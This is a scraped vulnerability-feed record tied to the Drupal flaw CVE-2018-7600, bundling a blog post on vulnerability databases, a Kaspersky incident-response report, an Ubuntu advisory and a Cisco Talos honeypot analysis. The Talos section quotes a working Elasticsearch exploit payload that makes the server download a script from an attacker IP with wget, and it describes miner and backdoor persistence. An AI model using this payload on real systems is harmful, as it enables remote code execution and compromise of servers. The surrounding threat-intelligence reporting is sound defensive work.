government repository of standards based vulnerability management data | [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) | [Official](<https://nvd.nist.gov/vuln/data-feeds>), [Vulners](<https://vulners.com/stats>) \n[CNNVD](<http://www.cnnvd.org.cn/>) | Individual Vulnerabilities -> Government | China National Vulnerability Database of Information Security | [CNNVD-201803-1136](<http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201803-1136>) | [Official](<http://www.cnnvd.org.cn/web/xxk/xmlDown.tag>) \n[CNVD](<http://www.cnvd.org.cn/>) | Individual Vulnerabilities -> Government | China National Vulnerability Database | [CNTA-2018-0012](<http://www.cnvd.org.cn/webinfo/show/4463>) | n/a \n[JVN](<https://jvn.jp>) | Mixed Individual Vulnerabilities and Security Bulletins -> Government | Japan Vulnerability Notes | [JVN#65268217](<https://jvn.jp/jp/JVN65268217/index.html>) | n/a \n[BDU Fstec](<https://bdu.fstec.ru/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Government | Russian Data Security Threats Database | [BDU:2018-00749](<https://bdu.fstec.ru/vul/2018-00749>) | [Official](<https://bdu.fstec.ru/vul>) \n[Risk Based Security VulnDB](<https://vulndb.cyberriskanalytics.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Intelligence vendor | n/a | n/a \n[Flexera](<https://www.flexera.com/products/software-vulnerability-management/software-vulnerability-manager.html>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Intelligence vendor | n/a | n/a \n[Beyond Security SecuriTeam](<http://www.securiteam.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | Vulnerability Management vendor | [CVE-2016-9939](<http://www.securiteam.com/securitynews/5LP3G20MKY.html>) | n/a \n[VulDB](<https://vuldb.com/>) | Individual Vulnerabilities -> Commercial Vulnerability Scanners and Aggregators | \"Number 1 
vulnerability database worldwide with more than 117000 entries available.\" | [CVE-2018-7600](<https://vuldb.com/?id.115197>) | n/a \n[vFeed](<https://vfeed.io/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Trusted Vulnerability & Threat Intelligence Database\" | n/a | [Official](<https://vfeed.io/pricing/>) \n[Vulners](<https://vulners.com/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Complete Vulnerability DataBase & Security Scanne\" | [CVE-2018-7600](<https://vulners.com/cve/CVE-2018-7600>) | [Official](<https://vulners.com/cve/stats>) \n[Tenable](<https://www.tenable.com/plugins>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | Tenable Nessus Attack Scripting Language (NASL) plugins | [CVE-2018-7600](<https://www.tenable.com/plugins/nessus/109041>) | [Vulners](<https://vulners.com/stats>) \n[Snyk](<https://snyk.io/vuln/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Snyk helps you use open source and stay secure.\" | [CVE-2018-7600](<https://snyk.io/vuln/SNYK-PHP-DRUPALCORE-72112>) | n/a \n[Rapid7](<https://www.rapid7.com/db>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | \"Vulnerability & Exploit Database\" | [CVE-2018-7600](<https://www.rapid7.com/db/vulnerabilities/drupal-cve-2018-7600>) | n/a \n[Altx-Soft OVAL Repository](<https://ovaldb.altx-soft.ru/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Commercial Vulnerability Scanners and Aggregators | ALTEX-SOFT-owned OVAL repository | [CVE-2018-7600](<https://ovaldb.altx-soft.ru/Definition.aspx?id=oval:com.altx-soft.nix:def:19053>) | n/a \n[SecPod SCAP Repo](<https://www.scaprepo.com/>) | Mixed Individual Vulnerabilities and Security Bulletins -> 
Commercial Vulnerability Scanners and Aggregators | SecPod-owned OVAL repository | [CVE-2018-7600](<https://www.scaprepo.com/control.jsp?command=relation&relationId=oval:org.secpod.oval:def:603336>) | n/a \n[OpenVAS NVT](<http://www.openvas.org/openvas-nvt-feed.html>) | Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules | \"Public feed of Network Vulnerability Tests (NVTs) for the OpenVAS project\" | n/a | [Vulners](<https://vulners.com/stats>) \n[CIS OVAL](<https://oval.cisecurity.org/>) | Mixed Individual Vulnerabilities and Security Bulletins -> Open and formalized detection rules | Main database of OVAL content sponsored by Center for Internet Security | n/a | [Official](<https://oval.cisecurity.org/repository/download>) \n[CentOS CESA](<https://lists.centos.org/pipermail/centos-announce/>) | Security Bulletins -> All software in repository | The CentOS-announce Archives | [CESA-2014:0376](<https://lists.centos.org/pipermail/centos-announce/2014-April/020249.html>) | [Vulners](<https://vulners.com/stats>) \n[Ubuntu USN](<https://usn.ubuntu.com/>) | Security Bulletins -> All software in repository | Ubuntu security notices | [USN-2165-1](<https://usn.ubuntu.com/2165-1/>) | [Vulners](<https://vulners.com/stats>) \n[RedHat RHSA](<https://www.redhat.com/archives/rhsa-announce/>) | Security Bulletins -> All software in repository | The RedHat-announce Archives | [RHSA-2014:0376](<https://access.redhat.com/errata/RHSA-2014:0376>) | [Vulners](<https://vulners.com/stats>) \n[Debian DSA](<https://www.debian.org/security/>) | Security Bulletins -> All software in repository | Debian Security Advisories | [DSA-4156-1](<https://www.debian.org/security/2018/dsa-4156>) | [Vulners](<https://vulners.com/stats>) \nMicrosoft KB | Security Bulletins | Microsoft Knowledge Base | [KB4013389](<https://support.microsoft.com/kb/4013389>) | n/a \n[Microsoft 
MS](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/securitybulletins>) | Security Bulletins | Microsoft Security Bulletin | [MS17-10](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>) | n/a \n[CISCO SA](<https://tools.cisco.com/security/center/mpublicationListingDetails.x?docType=CiscoSecurityAdvisory>) | Security Bulletins | Cisco Security Advisories | [cisco-sa-20180521](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180521-cpusidechannel>) | [Vulners](<https://vulners.com/stats>) \n[OpenSSL Vulnerabilities](<https://www.openssl.org/news/vulnerabilities.html>) | Security Bulletins | OpenSSL Vulnerabilities | [CVE-2018-0737](<https://www.openssl.org/news/secadv/20180416.txt>) | [Vulners](<https://vulners.com/stats>) \n[Apache](<https://httpd.apache.org/security_report.html>) | Security Bulletins | Security Problems with the Apache HTTP Server | [CVE-2017-9798](<https://httpd.apache.org/security/vulnerabilities_22.html>) | [Vulners](<https://vulners.com/stats>) \n[Mozilla MFSA](<https://www.mozilla.org/en-US/security/advisories/>) | Security Bulletins | Mozilla Foundation Security Advisories | [mfsa2018-13](<https://www.mozilla.org/en-US/security/advisories/mfsa2018-13/>) | [Vulners](<https://vulners.com/stats>) \n \n### Other Vulnerability Databases\n\nOf course this table is far from being complete. 
It's a basic structure, just to give an overall picture.\n\nYou can find more:\n\n * Different Vulnerability Databases in [Vulnerability Database Catalog by FIRST.org](<https://www.first.org/global/sigs/vrdx/vdb-catalog>).\n * Security Bulletins for different Operating Systems and Software at [Vulners.com stats page](<https://vulners.com/stats>) (blocks \"Unix\" and \"Software\").\n * Bases of OVAL content listed at [MITRE OVAL Product List](<https://oval.mitre.org/adoption/productlist.html>) (it is in archive state; see the type \"Definition Repository\")\n\nDo you know any other interesting sources about known software vulnerabilities? Feel free to mention them in the comments below.\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-05T15:57:41", "type": "avleonov", "title": "Vulnerability Databases: Classification and Registry", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9939", "CVE-2017-9798", "CVE-2018-0737", "CVE-2018-7600"], "modified": "2018-06-05T15:57:41", "id": "AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "href": 
"http://feedproxy.google.com/~r/avleonov/~3/o1m4yya8LXc/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securelist": [{"lastseen": "2020-08-07T08:03:43", "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. 
The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims' environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. 
Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. 
More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story "[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)".\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. 
The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see that the suspicious files detected originated from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complementary experts for a primary incident response team from the victim's organization and we have no information on all of their findings \u2013 hence the 'Unknown reasons' on the charts. 
Malicious emails are most likely to be detected by a variety of security toolstacks, but that's not showing the distribution of 0- to 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization's network perimeter went unnoticed for the longest. Social engineering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can't be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. 
PowerShell can be used for virtually any task.\n\nLet's weigh those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&CK) where they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller & Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary's activity and the end of the attack. 
As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary's activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. 
\n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn't have a specialist in threat hunting or they are managed by an external SOC that doesn't have the full context for an event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 
70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)\n\n## How long response took\n\nDistribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)\n\n## **MITRE ATT&CK tactics and techniques**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)\n\n## Conclusion\n\nIn 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.\n\nImproved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or start detections immediately after compromise.\n\nVarious tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. 
This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.\n\nAdversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.\n\nApplying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "cvss3": {}, "published": "2020-08-06T10:00:34", "type": "securelist", "title": "Incident Response Analyst Report 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"], "modified": "2020-08-06T10:00:34", "id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-01-26T15:26:34", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * drupal7 \\- fully-featured content management framework\n\nIt was discovered that Drupal did not properly process certain input. An \nattacker could use this vulnerability to execute arbitrary code or \ncompletely compromise a Drupal site. (CVE-2018-7600, CVE-2018-7602)\n\nIt was discovered that password reset URLs in Drupal could be forged. An \nattacker could use this vulnerability to gain access to another user's \naccount. This issue affected only Ubuntu 14.04 ESM. 
(CVE-2015-2559)\n\nIt was discovered that Drupal did not properly protect against open \nredirects. An attacker could use this vulnerability to send unsuspecting \nusers to 3rd party sites and potentially carry out phishing attacks. \nThis issue affected only Ubuntu 14.04 ESM. (CVE-2015-2749, CVE-2015-2750)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-15T00:00:00", "type": "ubuntu", "title": "Drupal vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2559", "CVE-2015-2749", "CVE-2015-2750", "CVE-2018-7600", "CVE-2018-7602"], "modified": "2021-03-15T00:00:00", "id": "USN-4773-1", "href": "https://ubuntu.com/security/notices/USN-4773-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2019-03-01T16:16:02", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. 
We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. 
The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. 
\n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. 
Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. 
